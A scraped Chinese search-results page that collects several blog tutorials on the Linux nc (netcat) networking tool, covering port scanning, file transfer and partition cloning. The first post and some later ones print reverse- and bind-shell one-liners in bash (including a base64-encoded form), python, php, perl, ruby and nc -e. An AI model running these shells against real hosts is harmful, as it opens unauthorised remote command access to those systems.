精华内容
下载资源
问答
  • 主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
  • Windows/Linux 下nc 反弹shell

    千次阅读 2019-06-11 15:26:56
    *Windows/Linux 下nc 反弹shell 高二那年班主任对我们说:其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的,要来有什么用? NC概述: nc又名netcat,一个简单而有用...

    Windows/Linux 下nc 反弹shell

     高二那年班主任对我们说:其实我并不反对你们谈恋爱,
    	                 只是你们记得要找一个有担当的,
    	                     那些一看见老师就松开你手的,要来有什么用?
    

    NC概述:

    • nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。
    • 何为反弹shell?为什么不反弹攻击?
      相信你有一天可以直接把所有攻击反弹回去的.

    常用命令

    banner获取

    nc -nv ip port
    

    连接远程主机

    nc -nvv ip port
    

    端口扫描

    nc -v ip port            //指定端口
    nc -v -z  ip 1-1555         //指定端口段
    

    文件传输

    nc  -lvp  8888 < test.txt  服务端
    nc -nv 服务端ip 8888 > test.txt 客户端
    

    获取shell

    正向shell:客户端想要获取服务器shell

    	客户端监听
    nc -lvp 8888 -e /bin/sh 
    nc -lvp 8888 -e c:\windows\system32\cmd.exe 
    	服务端反弹
    	nc 服务端ip 8888
    

    反向shell:服务端想要获取客户端器shell

    客户端监听
    nc -lvp 8888 
    服务端反弹
    nc ip 8888 -e /bin/sh 
    nc ip 8888 -e c:\windows\system32\cmd.exe 
    

    没有nc是,由于各种环境不同,可以结合天时地利人和。

    • Bash
    bash -i >& /dev/tcp/ip/port 0>&1
    base64版 
    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzUvNzg5MCAwPiYx|{base64,-d}|{bash,-i}'
    
    • python
    python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
    
    • php
    php -r '$sock=fsockopen("ip",port);exec("/bin/sh -i <&3 >&3 2>&3");'
    
    • perl
    Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    
    • ruby
    ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    
    • nc反弹nc
    nc -e /bin/bash ip port
    

    成功反弹shll
    在这里插入图片描述

    余生很长,请多指教。
    在这里插入图片描述

    展开全文
  • linux下nc的使用

    2014-10-09 19:28:28
    linux下nc的使用  (2012-03-20 14:44:05) 转载▼ 标签:  杂谈 分类: Linux 今天在饮水思源上闲逛,看到了一个贴子关于Linux下nc命来实现文件传输,进行学习了解了一下。 ...

    linux下nc的使用

     (2012-03-20 14:44:05)
    标签: 

    杂谈

    分类: Linux
    今天在饮水思源上闲逛,看到了一个贴子关于Linux下nc命来实现文件传输,进行学习了解了一下。
    发送端:
    cat test.txt | nc -l -p 6666
    或者nc -l  -p 6666 < test.txt                    有些版本不要在 -p
    【监听6666端口,等待连接】(设发送端IP为10.20.133.152)
    接收端:
    nc 10.20.133.152 6666 > test1.txt
    如上面的操作,即可将文件test.txt从发送端传送到接收端,保存为test1.txt

    想要连接到某处: nc [-options] hostname port[s] [ports] ...
    绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

    语  法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文 件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端 口...]
    补充说明:执行本指令可设置路由器的相关参数。
    参  数:
    -g<网关> 设置路由器跃程通信网关,最丢哦可设置8个。
    -G<指向器数目> 设置来源路由指向器,其数值为4的倍数。
    -h 在线帮助。
    -i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口。
    -l 使用监听模式,管控传入的资料。
    -n 直接使用IP地址,而不通过域名服务器。
    -o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
    -p<通信端口> 设置本地主机使用的通信端口。
    -r 乱数指定本地与远端主机的通信端口。
    -s<来源位址> 设置本地主机送出数据包的IP地址。
    -u 使用UDP传输协议。
    -v 显示指令执行过程。
    -w<超时秒数> 设置等待连线的时间。
    -z 使用0输入/输出模式,只在扫描通信端口时使用。

    另外,nc命令也可用于端口扫描:
    nc -v -z -w2 10.20.133.152 1-14000
    可以扫描10.20.133.152主机上的1~14000号TCP端口;

    nc -u -v -z -w2 10.20.133.152 1-14000
    可以扫描10.20.133.152主机上的1~14000号UDP端口。


    nc是一款很不错的网络检测工具,以下是详细使用。
    'nc.exe -h'即可看到各参数的使用方法。
    基本格式:nc [-options] hostname port [ports] ...
       nc -l -p port [options] [hostname] [port]
    -d 后台模式
    -e prog 程序重定向,一旦连接,就执行 [危险!!]
    -g gateway source-routing hop point, up to 8
    -G num source-routing pointer: 4, 8, 12, ...
    -h 帮助信息
    -i secs 延时的间隔
    -l 监听模式,用于入站连接
    -L 连接关闭后,仍然继续监听
    -n 指定数字的IP地址,不能用hostname
    -o file 记录16进制的传输
    -p port 本地端口号
    -r 随机本地及远程端口
    -s addr 本地源地址
    -t 使用TELNET交互方式
    -u UDP模式
    -v 详细输出--用两个-v可得到更详细的内容
    -w secs timeout的时间
    -z 将输入输出关掉--用于扫描时
    端口的表示方法可写为M-N的范围格式。
    1)连接到远程主机
    格式:nc -nvv 192.168.x.x 80
    讲解:连到192.168.x.x的TCP80端口
    2)监听本地主机
    格式:nc -l -p 80
    讲解:监听本机的TCP80端口
    3)扫描远程主机
    格式:nc -nvv -w2 -z 192.168.x.x 80-445
    讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
    4)REMOTE主机绑定SHELL,例子:
    格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
    讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
    5)REMOTE主机绑定SHELL并反向连接,例子:
    格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
    讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
    以上为最基本的几种用法(其实NC的用法还有很多,
    当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)。
    6)作攻击程序用,例子:
    格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
    格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
    讲解:连接到192.168.x.x的80端口,并在其管道中发送'c:\exploit.txt'的内容(两种格式确有相同的效果,真是有异曲同工之妙:P)
    附:'c:\exploit.txt'为shellcode等
    7)作蜜罐用[1],例子:
    格式:nc -L -p 80
    讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
    8)作蜜罐用[2],例子:
    格式:nc -L -p 80 > c:\log.txt
    讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:\log.txt'中,如果把‘>'
      改为‘>>'即可以追加日志
    附:'c:\log.txt'为日志等
    9)作蜜罐用[3],例子:
    格式1:nc -L -p 80 < c:\honeypot.txt
    格式2:type.exe c:\honeypot.txt|nc -L -p 80
    讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,并把'c:\honeypot.txt'的内容‘送'入其管道中!
    10)备份档案
    A机的资料夹 /data备份到B主机的backup.tgz
    源主机: tar czf - work|nc -l -c -p 1234
    目的主机: nc 192.168.0.1 1234 >a.tgz

    A:tar -zcf data|nc -l -p 4444
    B:nc a 4444 >backup.tgz
    传完后ctrl+c中断连接,这样A主机不会生成档案直接传到了backup.tgz,缺点就是不知道啥时候传完,嘿嘿
    展开全文
  • linux 下nc 命令的使用

    2017-11-12 23:11:00
    linux下nc命令的使用 netcat被誉为网络安全界的‘瑞士军刀’,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一...

    linux 下nc 命令的使用

    netcat被誉为网络安全界的‘瑞士军刀’,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接。 
    一、基本使用 
    想要连接到某处: nc [-options] hostname port[s] [ports] … 
    绑定端口等待连接: nc -l port [-options] [hostname] [port] 
    参数: 
    -h 帮助信息 
    -l 监听模式,用于入站连接 
    -n 指定数字的IP地址,不能用hostname 
    -u UDP模式

    -t TCP模式(默认模式) 
    -v 详细输出——用两个-v可得到更详细的内容 
    -w secs timeout的时间 
    -z 将输入输出关掉——用于扫描时 
    其中端口号可以指定一个或者用lo-hi式的指定范围。 
    1)扫描端口 
    tcp扫描 
    shell&gt;nc -v -z -w2 192.168.1.131 1-30 
    udp扫描 
    shell&gt;nc -u -v -z -w2 192.168.1.131 1-30 
    2)连接到REMOTE主机,例子: 
    格式:nc -nvv 192.168.x.x 80 
    讲解:连到192.168.x.x的TCP80端口 
    3)监听LOCAL主机,例子: 
    格式:nc -l 80 
    讲解:监听本机的TCP80端口 
    4)扫描远程主机,例子: 
    格式:nc -nvv -w2 -z 192.168.x.x 80-445 
    讲解:扫描192.168.x.x的TCP80到TCP445的所有端口

    5)两台linux主机间传送数据

    Linux A:192.168.1.131

    Linux B:192.168.1.132

    现在需要从B主机上传输一个文件file_b到B主机上,那么操作方法如下所示: 
    在A主机上:nc -d -l 1000 > /data/file_out &(启动端口监听) 
    在B主机上:nc 192.168.1.131 1000 < file_in(从A主机上启动的监听端口传送数据) 
    文件传输完毕后,系统会自动断开连接。从上面来看,它其实是一个很简单的Server/Client模式,服务器端开启侦听端口,并用输入输出重定向到一个文件file.out当中,等待客户端的连接。客户端主动连接主机,并和它建立一个Socket连接,然后把传输的文件重定向到数据流当中。 
    需要注意的一点是,主机侦听的端口必须是已经开放的端口,可以通过查看iptables进行配置。




    本文转自 yubowei 51CTO博客,原文链接:http://blog.51cto.com/samyubw/555247

    展开全文
  • Linux nc 命令介绍

    2020-06-03 22:18:38
    come on 伸出中指戳戳上方关注我……本文空调开放,欢迎阅读ncLinux 的一个强大的命令。nc 是简称,全名是 netcat。大部分的 Linux 发行版都有自带 nc...

    come on 伸出中指戳戳上方关注我……

    本文空调开放,欢迎阅读

    nc 是 Linux 下的一个强大的命令。nc 是简称,全名是 netcat。大部分的 Linux 发行版都有自带 nc 这个命令,如果没有的话就需要自己安装了

    我这里使用的是 CentOS 7.3,对于 nc,你可以使用 yum 安装或者自己编译二进制文件。这里推荐使用 yum 安装,因为 yum 可以自动解决依赖问题

    1
    
    
    yum install nmap-ncat.x86_64
    
    

    同样,netcat 也有 Windows 版本可用,你可以在 https://eternallybored.org/misc/netcat 这里下载到 netcat 的 Windows 版本。这里下载到的是一个压缩包,里面包含 netcat 的源代码和 nc & nc64 两个已经编译好的二进制文件,你可以根据自己系统来选择使用 nc 或 nc64

    成功安装之后你就可以使用 nc 命令了,使用 nc –help,你可以查看到 nc 命令的详细帮助。我在这里使用几个具体的例子来简要概述下 nc 命令的基本使用方法


    0. nc 命令的标准使用形式

    1
    
    
    nc [-options] ip port[s] [ports]
    
    

    ip 处是可以使用域名的,nc 会调用 DNS 解析成 IP 地址。如果不需要 nc 自动解析的话可以在执行时添加 -n [–nodns] 参数


    1. 两台主机之间发送实时消息

    1
    2
    
    
    A 主机:nc -lp port
    B 主机:nc ip port
    
    

    -l [–listen]:绑定并监听传入的连接
    -p [–source-port]:指定要使用的源端口

    建立连接后在任意一台主机输入信息并按下回车发送后对方就能收到
    因为 nc 是会自动从标准流中读取数据的,如果想要禁止,可以在命令执行时使用 -d 参数


    2. 两台主机之间传送文件

    1
    2
    
    
    接收端:nc -lp port > outputfile
    发送端:nc destip port < inputfile
    
    

    这一条本质和上面那个是一样的,只是借用了输出重定向这个特性。同样,nc 命令也支持管道,你甚至可以借由此实现克隆分区:

    1
    2
    3
    4
    5
    6
    7
    
    
    接收端:
    unmount /dev/sda2
    nc -lp port | dd of=/dev/sda2
    
    发送端:
    unmount /dev/sda1
    dd if=/dev/sda1 | nc destip port
    
    


    3. 发送 HTTP 请求

    1
    2
    3
    4
    5
    6
    7
    8
    9
    
    
    $nc destip 80 <<EOF
    
    GET /HTTP/1.1
    
    Cookie:xxx
    xxx:xxx
    xxx
    
    EOF
    
    

    为什么?因为 nc 发送的是纯文本
    保存 Web 页面?重定向输出流就好了


    4. 反向代理 Shell

    1
    2
    
    
    发送端:nc -lp localport
    执行端:nc -t -e C:/windows/system32/cmd.exe destip destport
    
    

    -t [–telnet]:响应 telnet 交互
    -e [–exec-command]:执行给定的命令,也可以携带一个 lua 脚本

    destip 和 destport 即为发送端的 IP 和 localport
    连接成功后,发送端的会得到一个执行端的 Shell

    你可以使用 -w 来设置无响应时的超时时间

    nc 在默认情况下,如果连接到 Server 的 Client 断开连接,那么 Server 也会跟着退出。你可以使用 -k 参数来保持 Server 的监听状态

    nc 是支持 IPV6 的,你可以使用 -4 & -6 参数来指定使用 IPV4 或 IPV6

    nc 默认是使用 TCP 协议通信,但是也支持 UDP,可添加 -u 参数来使用 UDP 协议

    对于使用 nc 去扫描端口这个用途,我是不推荐的,因为 nc 的扫描速度十分之慢。
    而且,在最新的 nc 中,已经去掉了 -z    (zero-I/O mode [used for scanning]) 这个参数。
    所以,对于这个需求,还是使用更专业的 nmap 吧

    展开全文
  • Linux下nc的使用

    2012-08-15 10:38:00
    今天在饮水思源上闲逛,看到了一个贴子关于Linux下nc命来实现文件传输,进行学习了解了一下。 发送端: cat test.txt | nc -l -p 6666 或者nc -l -p 6666 &lt; test.txt 【监听6666端口,等待连接】(设发送...
  • come on 伸出中指戳戳上方关注我……本文空调开放,欢迎阅读ncLinux 的一个强大的命令。nc 是简称,全名是 netcat。大部分的 Linux 发行版都有自带 nc 这个命令,如果没有的话就需要自己安装了我这里使用的是 ...
  • Linux下nchome拷入到windows下启用ncSysconfig如何操作   1、 1. 复制一个在windows下使用的nchome中的root.bat文件   2、 2. 运行中执行以下命令(linux下拷过来的代码直接放在D盘的根目录下)      ...
  • Linux下NC详解

    2017-11-23 15:04:50
    nc 是一个功能强大的网络工具,全称是netcat。 语法: nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...] 参数说明: -g 设置路由器跃程通信网关,最丢哦可设置8个。 -G 设置来源...
  • linux下nc神器简介

    2016-09-04 22:09:53
    nc在Linux和windows下的安装 netcat(简称nc)被誉为网络安全界的‘瑞士军刀’,相信很多人都认识它吧。它是一个简单但实用的工具,通过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的... nclinux下
  • linux下nc命令

    千次阅读 2015-06-16 19:37:18
    一、nc命令检测端口的用法 # nc -v -w 10 %IP% -z %PORT% -v 显示指令执行过程。 -w 设置等待连线的时间。 -u 表示使用UDP协议 -z 使用0输入/输出模式,只在扫描通信端口时使用。 例1:扫描指定的...
  • Linux下nc命令的使用

    2019-10-08 23:55:18
    nc命令的作用 实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 端口的扫描,nc可以作为client发起TCP或UDP连接 机器之间传输文件 机器之间网络测速 nc命令的安装 sh-4.2# yum...
  • Linux下nc的参数详解

    千次阅读 2015-08-30 11:11:09
    想必接触linux下服务器编程的人一定用过一个一个功能强大且有着瑞士军刀美誉的短小精悍的命令nc吧。我们既可以用nc构建出服务器也可以用作客户端,而且我们可以通过它的各种参数来精准的控制一些传输与连接的细节,...
  • Linux下nc传输文档

    2014-12-05 16:42:00
    # 发送端 host: fasong IP:192.168.0.100 # 接受端 host:jieshou IP:192.168.0.200 # 先在其中一端建立端口监听 # 1.... # 发送端监听 ... nc -l 1234 <... nc fasong 1234 >... # nc 192.168.0...
  • linux nc 命令的使用

    2017-07-21 21:08:00
    netcat被誉为网络安全界的‘瑞士军刀’,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。...想要连接到某处: nc [-options] hostname port[s] [ports] … 绑定端口等待连接: ...
  • linux 下nc命令(NetCat)使用详解

    千次阅读 2019-08-25 23:29:56
    nc(NetCat)在网络工具中有“瑞士军刀”的美誉,其有Windows和Linux的版本。因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小)、功能实用,被设计为一个简单、可靠的网络工具,可通过TCP或UDP协议传输...
  • linux下nc检测端口

    2013-05-06 23:14:43
    nc -z -v -w 2 -n 10.20.22.37 1-50000 2>/dev/null [@more@] ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 692
精华内容 276
关键字:

linux下nc

linux 订阅